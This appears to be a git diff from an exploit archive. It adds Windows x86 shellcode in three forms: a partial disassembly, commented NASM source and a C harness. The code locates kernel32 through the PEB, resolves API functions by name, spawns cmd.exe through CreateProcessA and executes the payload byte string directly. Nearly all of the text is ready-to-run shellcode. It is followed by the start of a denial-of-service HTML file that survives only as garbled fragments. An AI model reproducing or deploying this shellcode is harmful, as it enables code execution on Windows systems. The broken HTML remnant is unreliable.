push %esi + d3: 56 push %esi + d4: 53 push %ebx + d5: 56 push %esi + d6: ff d0 call *%eax + d8: 5e pop %esi + d9: 83 c4 08 add $0x8,%esp + dc: 31 db xor %ebx,%ebx + de: 68 65 73 73 41 push $0x41737365 + e3: 88 5c 24 03 mov %bl,0x3(%esp) + e7: 68 50 72 6f 63 push $0x636f7250 + ec: 68 45 78 69 74 push $0x74697845 + f1: 8d 1c 24 lea (%esp),%ebx + f4: 53 push %ebx + f5: 57 push %edi + f6: ff d6 call *%esi + f8: 31 c9 xor %ecx,%ecx + fa: 51 push %ecx + fb: ff d0 call *%eax +*/ + + +/* +section .text + global _start +_start: + + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;PEB +mov eax,[eax+0xc] ;PEB->ldr +mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov ecx,[eax+0x10] ;kernel32 base address + + +xor ebx,ebx +mov ebx,[ecx+0x3c] ;DOS->elf_anew +add ebx,ecx ;PE HEADER +mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress +add ebx,ecx ;IMAGE_EXPORT_DIRECTORY + +mov esi,[ebx+0x20] ;AddressOfNames +add esi,ecx + + +;--------------------------------------------- + +xor edx,edx + +func: +inc edx +lodsd +add eax,ecx +cmp dword [eax],'GetP' +jnz func +cmp dword [eax+4],'rocA' +jnz func +cmp dword [eax+8],'ddre' +jnz func + + +;-------------------------------- + + +mov esi,[ebx+0x1c] ;AddressOfFunctions +add esi,ecx + +mov edx,[esi+edx*4] +add edx,ecx ;GetProcAddress() + +;------------------------------------- + +mov esi,edx +mov edi,ecx + +;------------------------- + + +xor ebx,ebx + + +;finding address of RtlZeroMemory() + +push 0x41414179 +mov [esp+1],word bx +push 0x726f6d65 +push 0x4d6f7265 +push 0x5a6c7452 + + + +push esp +push ecx + +call edx + +;------------------------------ +add esp,16 +;----------------------------------- + + +;zero out 84 bytes + + +xor ecx,ecx +mov edx,ecx + +mov dl,84 + +push ecx + +sub esp,84 + +lea ecx,[esp] + +push ecx + +push edx +push ecx + +call eax + + +;---------------------------- + +;finding address of CreateProcessA() +pop ecx + +xor edx,edx + +push 0x42424173 +mov [esp+2],word dx +push 0x7365636f +push 0x72506574 +push 0x61657243 + +lea edx,[esp] + +push ecx + +push edx +push edi + +call esi + + +;-------------------------------- +;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) + +pop ecx + +add esp,16 + +xor ebx,ebx +push 0x41657865 +mov [esp+3],byte bl +push 0x2e646d63 + +lea ebx,[esp] + + +xor edx,edx +mov dl,68 + +mov [ecx],edx + +lea edx,[ecx+68] + + +push esi ; + +xor esi,esi + + +push edx +push ecx + +push esi +push esi +push esi +push esi +push esi +push esi + +push ebx +push esi + +call eax + +pop esi + +;------------------------------------- +;finding address of ExitProcess() + +add esp,8 + +xor ebx,ebx + +push 0x41737365 +mov [esp+3],byte bl +push 0x636f7250 +push 0x74697845 + + +lea ebx,[esp] + + +push ebx +push edi + +call esi + +xor ecx,ecx +push ecx +call eax +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0"; + +main() +{ +printf("shellcode lenght %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/windows/dos/40253.html b/platforms/windows/dos/40253.html new file mode 100755 index 000000000..437a03116 --- /dev/null +++ b/platforms/windows/dos/40253.html @@ -0,0 +1,21 @@ + + + + + +iiThS9l_J8 + +A7 +